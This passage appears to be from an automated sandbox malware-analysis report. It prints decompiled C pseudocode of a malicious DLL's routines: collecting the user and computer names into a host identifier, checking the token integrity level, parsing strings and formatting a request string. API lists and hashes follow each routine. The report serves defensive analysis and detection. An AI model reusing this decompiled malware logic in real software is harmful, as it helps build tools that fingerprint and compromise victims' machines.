                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                          • String ID:
                                          • API String ID: 1814172918-0
                                          • Opcode ID: 1cc18d6fd1dbb9abb983a67b22cd56b0df85a451299f5dc4352876c46a5adfa1
                                          • Instruction ID: 2ae46cbc5f97571fd3a3d1528c30f42adfd200c1f9eaa1044fb11edd1f0debb7
                                          • Opcode Fuzzy Hash: 1cc18d6fd1dbb9abb983a67b22cd56b0df85a451299f5dc4352876c46a5adfa1
                                          • Instruction Fuzzy Hash: 0021C076600604BFD722EBA8CD49FCA37B9EB44751F248125F645E7280E6B4EA04CBE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047B93D5, Relevance: 12.1, APIs: 8, Instructions: 103memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 139 47b93d5-47b93e9 140 47b93eb-47b93f0 139->140 141 47b93f3-47b9405 call 47b6f89 139->141 140->141 144 47b9459-47b9466 141->144 145 47b9407-47b9417 GetUserNameW 141->145 146 47b9468-47b947f GetComputerNameW 144->146 145->146 147 47b9419-47b9429 RtlAllocateHeap 145->147 148 47b94bd-47b94e1 146->148 149 47b9481-47b9492 RtlAllocateHeap 146->149 147->146 150 47b942b-47b9438 GetUserNameW 147->150 149->148 153 47b9494-47b949d GetComputerNameW 149->153 151 47b943a-47b9446 call 47b7cf7 150->151 152 47b9448-47b9457 HeapFree 150->152 151->152 152->146 155 47b949f-47b94ab call 47b7cf7 153->155 156 47b94ae-47b94b7 HeapFree 153->156 155->156 156->148
                                          C-Code - Quality: 96%
                                          			E047B93D5(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x47bd270; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E047B6F89( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x47bd2a0 ^ 0x76f6612d;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x47bd238, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E047B7CF7(_v8 + _v8, _t64);
							}
							HeapFree( *0x47bd238, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x47bd238, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E047B7CF7(_v8 + _v8, _t64);
						}
						HeapFree( *0x47bd238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}



















                                          0x047b93d5
                                          0x047b93dd
                                          0x047b93e1
                                          0x047b93e4
                                          0x047b93e9
                                          0x047b93eb
                                          0x047b93f0
                                          0x047b93f0
                                          0x047b93f6
                                          0x047b93f8
                                          0x047b9405
                                          0x047b9466
                                          0x047b9407
                                          0x047b940c
                                          0x047b9412
                                          0x047b9417
                                          0x047b9425
                                          0x047b9429
                                          0x047b9438
                                          0x047b943f
                                          0x047b9446
                                          0x047b9446
                                          0x047b9451
                                          0x047b9451
                                          0x047b9429
                                          0x047b9417
                                          0x047b9468
                                          0x047b946e
                                          0x047b9478
                                          0x047b947a
                                          0x047b947f
                                          0x047b948e
                                          0x047b9492
                                          0x047b949d
                                          0x047b94a4
                                          0x047b94ab
                                          0x047b94ab
                                          0x047b94b7
                                          0x047b94b7
                                          0x047b9492
                                          0x047b94c2
                                          0x047b94c4
                                          0x047b94c7
                                          0x047b94c9
                                          0x047b94cc
                                          0x047b94cf
                                          0x047b94d9
                                          0x047b94dd
                                          0x047b94e1

                                          APIs
                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 047B940C
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 047B9423
                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 047B9430
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 047B9451
                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 047B9478
                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 047B948C
                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 047B9499
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 047B94B7
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: HeapName$AllocateComputerFreeUser
                                          • String ID:
                                          • API String ID: 3239747167-0
                                          • Opcode ID: 24311f16196054ba0a7ba3293037fbd45ba526d33a0aa8f92f1a6145af680dc7
                                          • Instruction ID: d5ab4aa7fa6285191222fe6efcbe1db9b7ef54ef274395d6594023f52160186a
                                          • Opcode Fuzzy Hash: 24311f16196054ba0a7ba3293037fbd45ba526d33a0aa8f92f1a6145af680dc7
                                          • Instruction Fuzzy Hash: 21311AB1A00209EFDB21DFA9DD80BEEB7F9EB44310F518469E654D7210D734EE059B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047B53E3, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 100%
                                          			E047B53E3(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x47bd25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E047B58BE(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E047B147E(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                                          0x047b53f0
                                          0x047b53f7
                                          0x047b53fe
                                          0x047b5412
                                          0x047b541d
                                          0x047b5435
                                          0x047b5442
                                          0x047b5445
                                          0x047b544a
                                          0x047b5455
                                          0x047b5459
                                          0x047b5468
                                          0x047b546c
                                          0x047b5488
                                          0x047b5488
                                          0x047b548c
                                          0x047b548c
                                          0x047b5491
                                          0x047b5495
                                          0x047b549b
                                          0x047b549c
                                          0x047b54a3
                                          0x047b54a9

                                          APIs
                                          • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 047B5415
                                          • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 047B5435
                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 047B5445
                                          • CloseHandle.KERNEL32(00000000), ref: 047B5495
                                            • Part of subcall function 047B58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,047B1C51), ref: 047B58CA
                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 047B5468
                                          • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 047B5470
                                          • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 047B5480
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                          • String ID:
                                          • API String ID: 1295030180-0
                                          • Opcode ID: 87b5ec51afd939792159d3e116180657e2a54497930afc0ace46bfd40d9c73ce
                                          • Instruction ID: bf6d7cdcce960ce29605bae99c7ff60f1b47710043dbf0980fd1f600b3adc5aa
                                          • Opcode Fuzzy Hash: 87b5ec51afd939792159d3e116180657e2a54497930afc0ace46bfd40d9c73ce
                                          • Instruction Fuzzy Hash: FE213D75900259FFEB119FA4DC44EEEBB79EB48304F008465F550A6251C7759E05DFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047B7C75, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 186 47b7c75-47b7c88 187 47b7c8f-47b7c93 StrChrA 186->187 188 47b7c8a-47b7c8e 187->188 189 47b7c95-47b7ca6 call 47b58be 187->189 188->187 192 47b7ceb 189->192 193 47b7ca8-47b7cb4 StrTrimA 189->193 195 47b7ced-47b7cf4 192->195 194 47b7cb6-47b7cbf StrChrA 193->194 196 47b7cd1-47b7cdd 194->196 197 47b7cc1-47b7ccb StrTrimA 194->197 196->194 198 47b7cdf-47b7ce9 196->198 197->196 198->195
                                          C-Code - Quality: 54%
                                          			E047B7C75(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E047B58BE(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0x47bc28c); // executed
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0x47bc28c);
						}
						_t2 = _t27 + 0x10; // 0x4d283a53
						 *( *_t2 + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					_t6 = _t27 + 0x10; // 0x4d283a53
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *_t6;
				}
				return 0;
			}










                                          0x047b7c80
                                          0x047b7c84
                                          0x047b7c86
                                          0x047b7c87
                                          0x047b7c8f
                                          0x047b7c8f
                                          0x047b7c93
                                          0x00000000
                                          0x00000000
                                          0x047b7c8a
                                          0x047b7c8b
                                          0x047b7c8e
                                          0x047b7c8e
                                          0x047b7c9b
                                          0x047b7ca0
                                          0x047b7ca6
                                          0x047b7cae
                                          0x047b7cb4
                                          0x047b7cb6
                                          0x047b7cbb
                                          0x047b7cbf
                                          0x047b7cc1
                                          0x047b7cc4
                                          0x047b7ccb
                                          0x047b7ccb
                                          0x047b7cd1
                                          0x047b7cd5
                                          0x047b7cd8
                                          0x047b7cd9
                                          0x047b7cdb
                                          0x047b7ce3
                                          0x047b7ce7
                                          0x047b7ce7
                                          0x047b7cf4

                                          APIs
                                          • StrChrA.SHLWAPI(?,00000020,00000000,06CB95AC,?,?,?,047B4C85,06CB95AC,?,?,?,047B4A8B,?,?,?), ref: 047B7C8F
                                          • StrTrimA.KERNELBASE(?,047BC28C,00000002,?,?,?,047B4C85,06CB95AC,?,?,?,047B4A8B,?,?,?,4D283A53), ref: 047B7CAE
                                          • StrChrA.SHLWAPI(?,00000020,?,?,?,047B4C85,06CB95AC,?,?,?,047B4A8B,?,?,?,4D283A53,?), ref: 047B7CB9
                                          • StrTrimA.SHLWAPI(00000001,047BC28C,?,?,?,047B4C85,06CB95AC,?,?,?,047B4A8B,?,?,?,4D283A53,?), ref: 047B7CCB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Trim
                                          • String ID: S:(M
                                          • API String ID: 3043112668-2217774225
                                          • Opcode ID: a2c3f26d228fcbc409e60a0d5a0e871bdb75584653fd1202bc417a5aa3a4672c
                                          • Instruction ID: bbbf7c6c031a83b76bbff1ca0264c936ed8c7033b24da2e33c87e58e36f0aaec
                                          • Opcode Fuzzy Hash: a2c3f26d228fcbc409e60a0d5a0e871bdb75584653fd1202bc417a5aa3a4672c
                                          • Instruction Fuzzy Hash: 0501B5716053166FD2369E658D48FBBBF9CEB85A50F11451CF8C1D7340DB60E80596F0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047B4908, Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 199 47b4908-47b4922 call 47b11af 202 47b4938-47b4946 199->202 203 47b4924-47b4932 199->203 205 47b4958-47b4973 call 47b1111 202->205 206 47b4948-47b494b 202->206 203->202 212 47b497d 205->212 213 47b4975-47b497b 205->213 206->205 207 47b494d-47b4952 206->207 207->205 209 47b4adb 207->209 211 47b4add-47b4ae2 209->211 214 47b4983-47b4998 call 47b1ec4 call 47b1a4e 212->214 213->214 219 47b499a-47b499d CloseHandle 214->219 220 47b49a3-47b49a9 214->220 219->220 221 47b49ab-47b49b0 220->221 222 47b49cf-47b49e7 call 47b58be 220->222 223 47b4ac6-47b4acb 221->223 224 47b49b6 221->224 231 47b49e9-47b4a11 memset RtlInitializeCriticalSection 222->231 232 47b4a13-47b4a15 222->232 226 47b4acd-47b4ad1 223->226 227 47b4ad3-47b4ad9 223->227 228 47b49b9-47b49c8 call 47b7827 224->228 226->211 226->227 227->211 237 47b49ca 228->237 233 47b4a16-47b4a1a 231->233 232->233 233->223 236 47b4a20-47b4a36 RtlAllocateHeap 233->236 238 47b4a38-47b4a64 wsprintfA 236->238 239 47b4a66-47b4a68 236->239 237->223 240 47b4a69-47b4a6d 238->240 239->240 240->223 241 47b4a6f-47b4a8f call 47b93d5 call 47b98f7 240->241 241->223 246 47b4a91-47b4a98 call 47b205b 241->246 249 47b4a9a-47b4a9d 246->249 250 47b4a9f-47b4aa6 246->250 249->223 251 47b4abb-47b4abf call 47b9b6f 250->251 252 47b4aa8-47b4aaa 250->252 256 47b4ac4 251->256 252->223 253 47b4aac-47b4ab0 call 47b6cd3 252->253 257 47b4ab5-47b4ab9 253->257 256->223 257->223 257->251
                                          C-Code - Quality: 57%
                                          			E047B4908(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				CHAR* _t46;
				void* _t49;
				void* _t51;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t63;
				CHAR* _t67;
				CHAR* _t68;
				char* _t69;
				void* _t70;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E047B11AF();
				if(_t21 != 0) {
					_t59 =  *0x47bd25c; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x47bd25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x47bd164(0, 2);
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E047B1111( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x47bd2a4; // 0x24fa5a8
					if( *0x47bd25c > 5) {
						_t8 = _t26 + 0x47be5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x47bea05; // 0x44283a44
						_t27 = _t7;
					}
					E047B1EC4(_t27, _t27);
					_t31 = E047B1A4E(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t63 = 5;
					if(_t54 != _t63) {
						 *0x47bd270 =  *0x47bd270 ^ 0x81bbe65d;
						_t32 = E047B58BE(0x60);
						 *0x47bd324 = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x47bd324; // 0x6cb95b0
							_t70 = _t70 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x47bd324; // 0x6cb95b0
							 *_t51 = 0x47be845;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x47bd238, 0, 0x43);
							 *0x47bd2c4 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x47bd25c; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x47bd2a4; // 0x24fa5a8
								_t13 = _t58 + 0x47be55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x47bc28f);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E047B93D5( ~_v8 &  *0x47bd270, 0x47bd00c); // executed
								_t42 = E047B98F7(0, _t55, _t63, 0x47bd00c); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E047B205B(_t55); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t67 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E047B9B6F(_t61, _t67, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t67;
									if(__eflags == 0) {
										goto L30;
									}
									_t46 = E047B6CD3(__eflags,  &(_t67[4])); // executed
									_t54 = _t46;
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t68 = _v12;
						if(_t68 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x47bd160();
							}
							goto L34;
						}
						_t69 =  &(_t68[4]);
						do {
						} while (E047B7827(_t63, _t69, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}
































                                          0x047b4908
                                          0x047b4912
                                          0x047b4915
                                          0x047b4918
                                          0x047b491b
                                          0x047b4922
                                          0x047b4924
                                          0x047b4930
                                          0x047b4932
                                          0x047b4932
                                          0x047b493b
                                          0x047b4941
                                          0x047b4946
                                          0x047b4960
                                          0x047b496c
                                          0x047b496e
                                          0x047b4973
                                          0x047b497d
                                          0x047b497d
                                          0x047b4975
                                          0x047b4975
                                          0x047b4975
                                          0x047b4975
                                          0x047b4984
                                          0x047b4991
                                          0x047b4998
                                          0x047b499d
                                          0x047b499d
                                          0x047b49a6
                                          0x047b49a9
                                          0x047b49cf
                                          0x047b49db
                                          0x047b49e0
                                          0x047b49e5
                                          0x047b49e7
                                          0x047b4a13
                                          0x047b4a15
                                          0x047b49e9
                                          0x047b49ed
                                          0x047b49f2
                                          0x047b49f7
                                          0x047b49fe
                                          0x047b4a04
                                          0x047b4a09
                                          0x047b4a0f
                                          0x047b4a16
                                          0x047b4a18
                                          0x047b4a1a
                                          0x047b4a29
                                          0x047b4a2f
                                          0x047b4a34
                                          0x047b4a36
                                          0x047b4a66
                                          0x047b4a68
                                          0x047b4a38
                                          0x047b4a38
                                          0x047b4a3e
                                          0x047b4a4b
                                          0x047b4a51
                                          0x047b4a51
                                          0x047b4a59
                                          0x047b4a62
                                          0x047b4a69
                                          0x047b4a6b
                                          0x047b4a6d
                                          0x047b4a74
                                          0x047b4a81
                                          0x047b4a86
                                          0x047b4a8b
                                          0x047b4a8d
                                          0x047b4a8f
                                          0x00000000
                                          0x00000000
                                          0x047b4a91
                                          0x047b4a96
                                          0x047b4a98
                                          0x047b4a9f
                                          0x047b4aa3
                                          0x047b4aa6
                                          0x047b4abb
                                          0x047b4abf
                                          0x047b4ac4
                                          0x00000000
                                          0x047b4ac4
                                          0x047b4aa8
                                          0x047b4aaa
                                          0x00000000
                                          0x00000000
                                          0x047b4ab0
                                          0x047b4ab5
                                          0x047b4ab7
                                          0x047b4ab9
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x047b4ab9
                                          0x047b4a9c
                                          0x047b4a9c
                                          0x047b4a6d
                                          0x047b49ab
                                          0x047b49ab
                                          0x047b49b0
                                          0x047b4ac6
                                          0x047b4acb
                                          0x047b4ad3
                                          0x047b4ad3
                                          0x00000000
                                          0x047b4acb
                                          0x047b49b6
                                          0x047b49b9
                                          0x047b49c3
                                          0x047b49ca
                                          0x00000000
                                          0x047b4adb
                                          0x047b4adb
                                          0x047b4ade
                                          0x047b4ae2
                                          0x047b4ae2

                                          APIs
                                            • Part of subcall function 047B11AF: GetModuleHandleA.KERNEL32(4C44544E,00000000,047B4920,00000001), ref: 047B11BE
                                          • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 047B499D
                                            • Part of subcall function 047B58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,047B1C51), ref: 047B58CA
                                          • memset.NTDLL ref: 047B49ED
                                          • RtlInitializeCriticalSection.NTDLL(06CB9570), ref: 047B49FE
                                            • Part of subcall function 047B6CD3: memset.NTDLL ref: 047B6CED
                                            • Part of subcall function 047B6CD3: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 047B6D24
                                            • Part of subcall function 047B6CD3: StrCmpNIW.SHLWAPI(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,047B4AB5), ref: 047B6D2F
                                          • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 047B4A29
                                          • wsprintfA.USER32 ref: 047B4A59
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                          • String ID:
                                          • API String ID: 4246211962-0
                                          • Opcode ID: 311be118bb56b738ce99a34f76d607264b2b7d79553b8b11b7fea6d75f7c8fdc
                                          • Instruction ID: 57241e0b3b9502e2593d11924b85484dcfd1c300575444f9cba670237284f9fc
                                          • Opcode Fuzzy Hash: 311be118bb56b738ce99a34f76d607264b2b7d79553b8b11b7fea6d75f7c8fdc
                                          • Instruction Fuzzy Hash: 5D51A671A00615AFEB31EBA4DD48FEE77A8EB04B04F148525E581E7382E778F9048BD4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047B6CD3, Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 157stringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 90%
                                          			E047B6CD3(void* __eflags, WCHAR* _a4) {
				char _v40;
				char _v44;
				void _v48;
				int _v52;
				char _v56;
				char _v60;
				void* _v64;
				char _v68;
				intOrPtr _v72;
				int _v76;
				WCHAR* _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				void* __ebx;
				void* __esi;
				intOrPtr _t40;
				int _t45;
				char _t50;
				intOrPtr _t52;
				void* _t55;
				intOrPtr _t67;
				void* _t70;
				void* _t81;
				WCHAR* _t90;

				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_v76 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t40 =  *0x47bd2a4; // 0x24fa5a8
				_t5 = _t40 + 0x47bee24; // 0x410025
				_t90 = E047B4814(_t5);
				_v84 = _t90;
				if(_t90 == 0) {
					_t81 = 8;
					L24:
					return _t81;
				}
				_t45 = StrCmpNIW(_t90, _a4, lstrlenW(_t90)); // executed
				if(_t45 != 0) {
					_t81 = 1;
					L22:
					E047B147E(_v88);
					goto L24;
				}
				if(E047B9138(0,  &_v96) != 0) {
					_v96 = 0;
				}
				_t50 = E047BA5E9(0,  *0x47bd33c);
				_v96 = _t50;
				if(_t50 == 0) {
					_t81 = 8;
					goto L19;
				} else {
					_t52 =  *0x47bd2a4; // 0x24fa5a8
					_t11 = _t52 + 0x47be81a; // 0x65696c43
					_t55 = E047BA5E9(0, _t11);
					_t93 = _t55;
					if(_t55 == 0) {
						_t81 = 8;
					} else {
						_t81 = E047B74B9(_v96, 0x80000001, _v92, _t93,  &_v60,  &_v56);
						E047B147E(_t93);
					}
					if(_t81 != 0) {
						L17:
						E047B147E(_v92);
						L19:
						_t92 = _v96;
						if(_v96 != 0) {
							E047B568A(_t92);
						}
						goto L22;
					} else {
						if(( *0x47bd260 & 0x00000001) == 0) {
							L14:
							E047B6E92(_t81, _v60, _v56,  *0x47bd270, 0);
							_t81 = E047B6737(_v72,  &_v64,  &_v60, 0);
							if(_t81 == 0) {
								_v68 = _v96;
								_v64 =  &_v60;
								_t81 = E047B72F2( &_v84, 0);
							}
							E047B147E(_v60);
							goto L17;
						}
						_t67 =  *0x47bd2a4; // 0x24fa5a8
						_t18 = _t67 + 0x47be823; // 0x65696c43
						_t70 = E047BA5E9(0, _t18);
						_t95 = _t70;
						if(_t70 == 0) {
							_t81 = 8;
						} else {
							_t22 =  &_v96; // 0x65696c43
							_t81 = E047B74B9( *_t22, 0x80000001, _v92, _t95,  &_v44,  &_v40);
							E047B147E(_t95);
						}
						if(_t81 != 0) {
							goto L17;
						} else {
							goto L14;
						}
					}
				}
			}




























                                          0x047b6ce9
                                          0x047b6ced
                                          0x047b6cf4
                                          0x047b6cfc
                                          0x047b6cfd
                                          0x047b6cfe
                                          0x047b6cff
                                          0x047b6d00
                                          0x047b6d01
                                          0x047b6d09
                                          0x047b6d15
                                          0x047b6d17
                                          0x047b6d1d
                                          0x047b6e86
                                          0x047b6e87
                                          0x047b6e8f
                                          0x047b6e8f
                                          0x047b6d2f
                                          0x047b6d37
                                          0x047b6e78
                                          0x047b6e79
                                          0x047b6e7d
                                          0x00000000
                                          0x047b6e7d
                                          0x047b6d4a
                                          0x047b6d4c
                                          0x047b6d4c
                                          0x047b6d58
                                          0x047b6d5d
                                          0x047b6d63
                                          0x047b6e66
                                          0x00000000
                                          0x047b6d69
                                          0x047b6d69
                                          0x047b6d6e
                                          0x047b6d77
                                          0x047b6d7c
                                          0x047b6d85
                                          0x047b6dac
                                          0x047b6d87
                                          0x047b6da1
                                          0x047b6da3
                                          0x047b6da3
                                          0x047b6daf
                                          0x047b6e59
                                          0x047b6e5d
                                          0x047b6e67
                                          0x047b6e67
                                          0x047b6e6d
                                          0x047b6e6f
                                          0x047b6e6f
                                          0x00000000
                                          0x047b6db5
                                          0x047b6dbc
                                          0x047b6e01
                                          0x047b6e14
                                          0x047b6e2d
                                          0x047b6e31
                                          0x047b6e37
                                          0x047b6e3f
